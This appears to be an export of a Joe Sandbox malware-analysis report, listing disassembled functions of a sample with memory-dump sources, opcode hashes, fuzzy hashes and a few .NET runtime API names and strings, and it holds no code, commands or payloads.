                                                                Function 00007FF708F624A0 Relevance: .2, Instructions: 187COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4f1b4cb941552fcd4360ae278186fc6b794deed9d6fa37c9a23f35ae8fa65c1b
                                                                • Instruction ID: d10b06814078952d23b28638ed55afb8b1b4298ae4e5677301325dda2ea9d54b
                                                                • Opcode Fuzzy Hash: 4f1b4cb941552fcd4360ae278186fc6b794deed9d6fa37c9a23f35ae8fa65c1b
                                                                • Instruction Fuzzy Hash: 7B51E432A05A859AEB14EF25EC416B9F7A1AF58B84F988135EE4D83740EF38E551C314
                                                                Function 00007FF708E18E84 Relevance: .2, Instructions: 175COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e885544be491c93185780af224f3dfb89e2c9525259590fae56bca72d21b295
                                                                • Instruction ID: bc8cc760462df3956f286b344ce823fb751d83a43929a85935041cd072fae339
                                                                • Opcode Fuzzy Hash: 8e885544be491c93185780af224f3dfb89e2c9525259590fae56bca72d21b295
                                                                • Instruction Fuzzy Hash: 2A61E377F11B5647EB08DF28C85566DB6A2FBD4B88B958136CA0D43789DF38DA10C380
                                                                Function 00007FF708E28C20 Relevance: .1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 678d63652a31e84ffb62e060d365b9f8b59bdcd6f238e2ff7fef420d5384b253
                                                                • Instruction ID: d64f6b9a65551d4c0f25c9fd034b8fecb59ebe740d1744562acb4d72e877c456
                                                                • Opcode Fuzzy Hash: 678d63652a31e84ffb62e060d365b9f8b59bdcd6f238e2ff7fef420d5384b253
                                                                • Instruction Fuzzy Hash: BF413BA1F29B1F41E905AB37DD41634D1625F6A7D0EA8C736E82E367D1EF3CB0848218
                                                                Function 00007FF708EC0710 Relevance: .1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 33896f689a15966a16f4bf487c2c35c76916e23fdfaef87dc9051dee5c382133
                                                                • Instruction ID: 5500452292376e02d5f151d490b782c25555df6d4116db7f9e9ccaccce2f87db
                                                                • Opcode Fuzzy Hash: 33896f689a15966a16f4bf487c2c35c76916e23fdfaef87dc9051dee5c382133
                                                                • Instruction Fuzzy Hash: 1C31B364E2850694FE18FF229C560F5D2311F5A7C0FD82031EA2E577A3AF2CE845876C
                                                                Function 00007FF708E37230 Relevance: .1, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f4f3ab9441f7c6e78e330ec42d043b465dd60656774d0ecd6200ff05dd329b4a
                                                                • Instruction ID: 125a843a348eb38e9a2b1d91bb90ec80e96ef13ea78ac950d43118670cc197c4
                                                                • Opcode Fuzzy Hash: f4f3ab9441f7c6e78e330ec42d043b465dd60656774d0ecd6200ff05dd329b4a
                                                                • Instruction Fuzzy Hash: 86419EA6B18B8A86EA00EF56D8581A9F361FB44FC0BC99032EE0D57755DF3CE951C318
                                                                Function 00007FF708EC0200 Relevance: .1, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fda43cea49e882a9a141085afc4d624ee38ae7d031c4b8acc096884a525e6c07
                                                                • Instruction ID: c8de87f77295b07ef6f1935472f1049305b4c68983566e95f4d79c732eabbecc
                                                                • Opcode Fuzzy Hash: fda43cea49e882a9a141085afc4d624ee38ae7d031c4b8acc096884a525e6c07
                                                                • Instruction Fuzzy Hash: 1C316864E2854685EE08FF629C151FAD2226F96780FC46071E92E1B7A3EF3CF4158768
                                                                Function 00007FF708EC0930 Relevance: .1, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3750b6ee256e7c2d73c31a0be9a135d1d2d6a143a595086885251f380ecb8509
                                                                • Instruction ID: 628e42659d3d5624e45a54240bf9ad9c33094e1db8040d1cbb0b1d11b5b215db
                                                                • Opcode Fuzzy Hash: 3750b6ee256e7c2d73c31a0be9a135d1d2d6a143a595086885251f380ecb8509
                                                                • Instruction Fuzzy Hash: B6217E71E1810655EE14FB66DC450FAE221AF95BC0F845134EE1E47763EF3CE4548368
                                                                Function 00007FF708F61FD0 Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7bf8297108d859422b54ec4d4f885cd3c3b7f34d11f8696f78f041e3ebc07d85
                                                                • Instruction ID: 07f3554c03034478200ad97fd1bf05882ebe47aa883ea8d0e357a2f21de2cf49
                                                                • Opcode Fuzzy Hash: 7bf8297108d859422b54ec4d4f885cd3c3b7f34d11f8696f78f041e3ebc07d85
                                                                • Instruction Fuzzy Hash: BA217FB5A1815159EE04FF22DC450FAE652AF85FC0F844071ED0E9B7A6EF2CFA058368
                                                                Function 00007FF708EC0100 Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d76b6707efa3b5a1f4713f955c497b0e51a135a0468e11aebc5dcb9c7a998917
                                                                • Instruction ID: 40ea7763a00a14710a342839871883ecb38508125b3ef4e75ffb721a6f477919
                                                                • Opcode Fuzzy Hash: d76b6707efa3b5a1f4713f955c497b0e51a135a0468e11aebc5dcb9c7a998917
                                                                • Instruction Fuzzy Hash: B7F04474E2840A94FE08FB32AC651FAD2216F69780FC41031D91D5B7A2EF2CE40687A8
                                                                Function 00007FF708EC08B0 Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7c35981a7196663069a3c50ba324e27e8c7f999e60f40e604aa1b39ecf2d555a
                                                                • Instruction ID: 21bab438444f40222d75df44456a46a06cd8e1852d26343ed91e828cb8439755
                                                                • Opcode Fuzzy Hash: 7c35981a7196663069a3c50ba324e27e8c7f999e60f40e604aa1b39ecf2d555a
                                                                • Instruction Fuzzy Hash: DBF03A64E1900655FC04FB22DC160FAD2215F56BC0FC46171EC6E4BBA3EF2CE5068368
                                                                Function 00007FF708E12034 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d6a367153182f37be14113b55edc77e876494cc7cc78ebc7caad4b936825955
                                                                • Instruction ID: f62c278bfac63aeea066984063391b84fef2a603992e93dbd22f09645597d4c1
                                                                • Opcode Fuzzy Hash: 6d6a367153182f37be14113b55edc77e876494cc7cc78ebc7caad4b936825955
                                                                • Instruction Fuzzy Hash: 5AF0F864E2800694EE14FF26AC550B9E2215F567C0FC82531D92E26BA3AF2CF445876C
                                                                Function 00007FF708E217F2 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5303cbcbd6fe6a22914ae7695902f9f843f50de41656ba80d6a5462dfd062fef
                                                                • Instruction ID: 94e80bd759edd02f3b96ef3f291d766c113608a4ca12bf5265b30836c5520902
                                                                • Opcode Fuzzy Hash: 5303cbcbd6fe6a22914ae7695902f9f843f50de41656ba80d6a5462dfd062fef
                                                                • Instruction Fuzzy Hash: 8290023241CE06C2D2042754DD25254A125EF15302F941830C32850911DB2D60828169
                                                                Function 00007FF708E1CC80 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF708E23467,?,?,?,?,00007FF708E1C305), ref: 00007FF708E1CCBE
                                                                • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF708E23467,?,?,?,?,00007FF708E1C305), ref: 00007FF708E1CCE6
                                                                • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF708E23467,?,?,?,?,00007FF708E1C305), ref: 00007FF708E1CD06
                                                                • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF708E23467,?,?,?,?,00007FF708E1C305), ref: 00007FF708E1CD26
                                                                • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF708E23467,?,?,?,?,00007FF708E1C305), ref: 00007FF708E1CD46
                                                                • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF708E23467,?,?,?,?,00007FF708E1C305), ref: 00007FF708E1CD6A
                                                                • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF708E23467,?,?,?,?,00007FF708E1C305), ref: 00007FF708E1CD8E
                                                                • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF708E23467,?,?,?,?,00007FF708E1C305), ref: 00007FF708E1CDB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: 00007B5630
                                                                • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                                                                • API String ID: 2248877218-945519297
                                                                • Opcode ID: c32a843d7d0df1e7b228eda382df79ec9e66a3668b187b86d4b04ee62691eced
                                                                • Instruction ID: dd513d2ed59fcb7e3874d445909758132ea5a588dbaf96d7f4f1e751131296fd
                                                                • Opcode Fuzzy Hash: c32a843d7d0df1e7b228eda382df79ec9e66a3668b187b86d4b04ee62691eced
                                                                • Instruction Fuzzy Hash: FC41E760A08A5350EA60BB159D401B9D761AF457B4FE80771D97C97BE9DF3CE842C328
                                                                Function 00007FF708E1BE70 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                                • String ID: InitializeContext2$kernel32.dll
                                                                • API String ID: 4102459504-3117029998
                                                                • Opcode ID: ed5d576bd7bfb487fb5dabab0bbeb8c3c0d2d0dbe65efdd3457be41ea0297f33
                                                                • Instruction ID: 899a681baa72a4fab4d877d486494cbd7482bff3bb18768b8a6c9980271dd058
                                                                • Opcode Fuzzy Hash: ed5d576bd7bfb487fb5dabab0bbeb8c3c0d2d0dbe65efdd3457be41ea0297f33
                                                                • Instruction Fuzzy Hash: 5B310172A1975781EA10AF65AD40279E3A1AF887A0FC40435DA8D42764DF7CE486DB38
                                                                Function 00007FF708E158C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                                                                • String ID: QueueUserAPC2$kernel32
                                                                • API String ID: 3714266957-4022151419
                                                                • Opcode ID: 202c6071c0cb3c04b58440e9d12fbaca62c231b728c23e0a4c68f7729bcd8aff
                                                                • Instruction ID: 6364cc47a19993645694a79ea7ff9001f3fd2004f0969b95c5f894514a0375fa
                                                                • Opcode Fuzzy Hash: 202c6071c0cb3c04b58440e9d12fbaca62c231b728c23e0a4c68f7729bcd8aff
                                                                • Instruction Fuzzy Hash: BB316F30A08A4381EE90BB55EC40379E3A1BF85BA4FD41271C96D867E4DF3CE406C768
                                                                Function 00007FF708E3D570 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 350COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: AcquireCriticalLeaveLockSection
                                                                • String ID: .NET BGC$BEGIN$condemned generation num: %d
                                                                • API String ID: 1584331419-305937650
                                                                • Opcode ID: 2a5b2d8be1523676a85e909d90b0e859ab8f9d8fb6d50f2b9fd3c13262e10d68
                                                                • Instruction ID: e81e7bf9bc4f374036e637f2dd24a043d80e8c66948044754a97bafbc23f56d8
                                                                • Opcode Fuzzy Hash: 2a5b2d8be1523676a85e909d90b0e859ab8f9d8fb6d50f2b9fd3c13262e10d68
                                                                • Instruction Fuzzy Hash: 36122AA1E08A8786F611AF28EC462B4F3B5BF55B44F845235DA4C12362EF3DF585C728
                                                                Function 00007FF708E15C90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
